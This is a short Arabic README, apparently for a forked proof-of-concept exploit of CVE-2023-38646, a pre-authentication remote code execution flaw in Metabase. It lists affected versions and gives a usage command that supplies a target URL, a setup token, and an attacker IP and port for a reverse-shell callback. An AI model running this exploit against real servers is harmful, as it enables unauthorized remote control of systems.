
CVE-2023-38646 تنفيذ أكواد عن بُعد قبل المصادقة في Metabase
شوكة من kh4sh3i مع إزالة الحاجة إلى Burp Collector.
CVE-2023-38646 (RCE قبل المصادقة في Metabase):
Metabase مفتوحة المصدر قبل الإصدار 0.46.6.1 وMetabase Enterprise قبل الإصدار 1.46.6.1 تسمح للمهاجمين بتنفيذ أوامر عشوائية على الخادم، على مستوى صلاحيات الخادم. المصادقة غير مطلوبة للاستغلال.
python3 CVE-2023-38646.py -u http://target.com -t 349fa13d-fd94-4d9b-b54f-b4ebf2df682f -i 10.10.15.101 -p 5555
لمزيد من المعلومات اقرأ هذا المنشور.